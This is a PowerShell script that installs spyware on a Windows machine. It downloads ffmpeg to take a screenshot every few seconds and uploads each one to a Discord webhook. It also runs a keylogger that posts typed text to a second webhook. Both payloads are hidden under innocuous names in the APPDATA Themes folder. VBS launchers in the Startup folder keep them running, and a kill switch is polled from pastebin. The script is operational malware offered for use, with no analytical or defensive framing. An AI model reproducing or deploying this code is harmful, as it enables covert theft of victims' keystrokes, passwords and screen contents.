stagingpost

1. # Assume the tokens have been retrieved and stored in these variables
2. $screenwebhooktoken = irm 'https://pastebin.com/raw/c8fg78KU'
3. $logwebhooktoken = irm 'https://pastebin.com/raw/STyjVHJR'
4. $killurl = 'https://pastebin.com/raw/aNPVXCZQ'
5.  
6. # Base URL for the Discord webhook
7. $webhookurl = 'https://discord.com/api/webhooks/'
8.  
9. # Construct the full webhook URLs by concatenating the base URL with the tokens
10. $screenwebhook = $webhookurl + $screenwebhooktoken
11. $logwebhook = $webhookurl + $logwebhooktoken
12.  
13.  
14. $scps1 = @'
15.  
16. $Path = "$env:Temp\ffmpeg.exe"
17. If (!(Test-Path $Path)){  
18. $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":hourglass: ``Downloading ffmpeg.exe. Please wait...`` :hourglass:"} | ConvertTo-Json
19. Invoke-RestMethod -Uri $hurl -Method Post -ContentType "application/json" -Body $jsonsys
20.    $zipUrl = 'https://www.gyan.dev/ffmpeg/builds/packages/ffmpeg-7.0-essentials_build.zip'
21.     $tempDir = "$env:temp"
22.     $zipFilePath = Join-Path $tempDir 'ffmpeg-7.0-essentials_build.zip'
23.     $extractedDir = Join-Path $tempDir 'ffmpeg-7.0-essentials_build'
24.     Invoke-WebRequest -Uri $zipUrl -OutFile $zipFilePath
25.     Expand-Archive -Path $zipFilePath -DestinationPath $tempDir -Force
26.     Move-Item -Path (Join-Path $extractedDir 'bin\ffmpeg.exe') -Destination $tempDir -Force
27.     Remove-Item -Path $zipFilePath -Force
28.     Remove-Item -Path $extractedDir -Recurse -Force
29. }
30.  
31. $mkvPath = "$env:Temp\ScreenClip.jpg"
32. if (Test-Path $mkvpath){
33.     rm -Path $mkvPath -Force
34. }
35.  
36. $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":arrows_counterclockwise: ``Taking Screenshots..`` :arrows_counterclockwise:"} | ConvertTo-Json
37. Invoke-RestMethod -Uri $hurl -Method Post -ContentType "application/json" -Body $jsonsys
38. while ($true){
39.     .$env:Temp\ffmpeg.exe -f gdigrab -i desktop -frames:v 1 -vf "fps=1" $mkvPath
40.     sleep 2
41.     curl.exe -F file1=@"$mkvPath" $hurl | Out-Null
42.     sleep 5
43.     rm -Path $mkvPath -Force
44.     $response = irm $killurl
45.     if ($response -like "kill") {
46.         rm -path "$env:APPDATA\Microsoft\Windows\Themes\ffmpeg.ps1"
47.         $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":octagonal_sign: ``REMOVED`` :octagonal_sign:"} | ConvertTo-Json
48.         Invoke-RestMethod -Uri $hurl -Method Post -ContentType "application/json" -Body $jsonsys
49.         exit
50.     }
51. }
52. '@
53.  
54. "`$hurl = '$screenwebhook' ; `$killurl = '$killurl'" | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\ffmpeg.ps1" -Force
55. $scps1 | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\ffmpeg.ps1" -Append -Force
56.  
57. $klps1 = @'
58.  
59. $API = @'
60. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
61. public static extern short GetAsyncKeyState(int virtualKeyCode);
62. [DllImport("user32.dll", CharSet=CharSet.Auto)]
63. public static extern int GetKeyboardState(byte[] keystate);
64. [DllImport("user32.dll", CharSet=CharSet.Auto)]
65. public static extern int MapVirtualKey(uint uCode, int uMapType);
66. [DllImport("user32.dll", CharSet=CharSet.Auto)]
67. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
68. '@
69.  
70. $klps2 = @'
71.  
72. $API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru
73.  
74. $LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew()
75. $KeypressThreshold = [TimeSpan]::FromSeconds(10)
76. While ($true){
77.  $keyPressed = $false
78.    try{
79.      while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) {
80.      Start-Sleep -Milliseconds 30
81.        for ($asc = 8; $asc -le 254; $asc++){
82.        $keyst = $API::GetAsyncKeyState($asc)
83.          if ($keyst -eq -32767) {
84.          $keyPressed = $true
85.          $LastKeypressTime.Restart()
86.          $null = [console]::CapsLock
87.          $vtkey = $API::MapVirtualKey($asc, 3)
88.          $kbst = New-Object Byte[] 256
89.          $checkkbst = $API::GetKeyboardState($kbst)
90.          $logchar = New-Object -TypeName System.Text.StringBuilder          
91.            if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) {
92.              $LString = $logchar.ToString()
93.                if ($asc -eq 8) {$LString = "[BKSP]"}
94.                if ($asc -eq 13) {$LString = "[ENT]"}
95.                if ($asc -eq 27) {$LString = "[ESC]"}
96.            $send += $LString
97.            }
98.          }
99.        }
100.        $response = irm $killurl
101.        if ($response -like "kill") {
102.            rm -path "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1"
103.            $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":octagonal_sign: ``REMOVED`` :octagonal_sign:"} | ConvertTo-Json
104.            Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys
105.            exit
106.        }
107.      }
108.    }
109.    finally{
110.      If ($keyPressed) {
111.      $escmsgsys = $send -replace '[&<>]', {$args[0].Value.Replace('&', '&amp;').Replace('<', '&lt;').Replace('>', '&gt;')}
112.      $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss"
113.      $escmsg = $timestamp+" : "+'`'+$escmsgsys+'`'
114.      $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsg} | ConvertTo-Json
115.      Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys
116.      $send = ""
117.      $keyPressed = $false
118.      }
119.    }
120.  $LastKeypressTime.Restart()
121.  Start-Sleep -Milliseconds 10
122. }
123.  
124. '@
125.  
126. "`$dc = '$logwebhook' ; `$killurl = '$killurl'" | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Force
127. $klps1 | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Append -Force
128. "'@" | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Append -Force
129. $klps2 | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Append -Force
130.  
131.  
132. $tobat = @'
133. Set objShell = CreateObject("WScript.Shell")
134. WScript.Sleep 500
135. objShell.Run "powershell.exe -NoP -NonI -Exec Bypass -W Hidden -File ""%APPDATA%\Microsoft\Windows\Themes\ffmpeg.ps1""", 0, True
136. '@
137.  
138. $pth = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\service.vbs"
139. $tobat | Out-File -FilePath $pth -Force
140.  
141.  
142. $tobat2 = @'
143. Set objShell = CreateObject("WScript.Shell")
144. WScript.Sleep 500
145. objShell.Run "powershell.exe -NoP -NonI -Exec Bypass -W Hidden -File ""%APPDATA%\Microsoft\Windows\Themes\update_check.ps1""", 0, True
146. '@
147.  
148. $pth2 = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"
149. $tobat2 | Out-File -FilePath $pth2 -Force
150.  
151.  
152. $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":white_check_mark: ``Persistance Installed!`` :white_check_mark:"} | ConvertTo-Json
153. Invoke-RestMethod -Uri $screenwebhook -Method Post -ContentType "application/json" -Body $jsonsys
154. sleep 1
155. & $pth
156. sleep 1
157. & $pth2
158.  
159. pause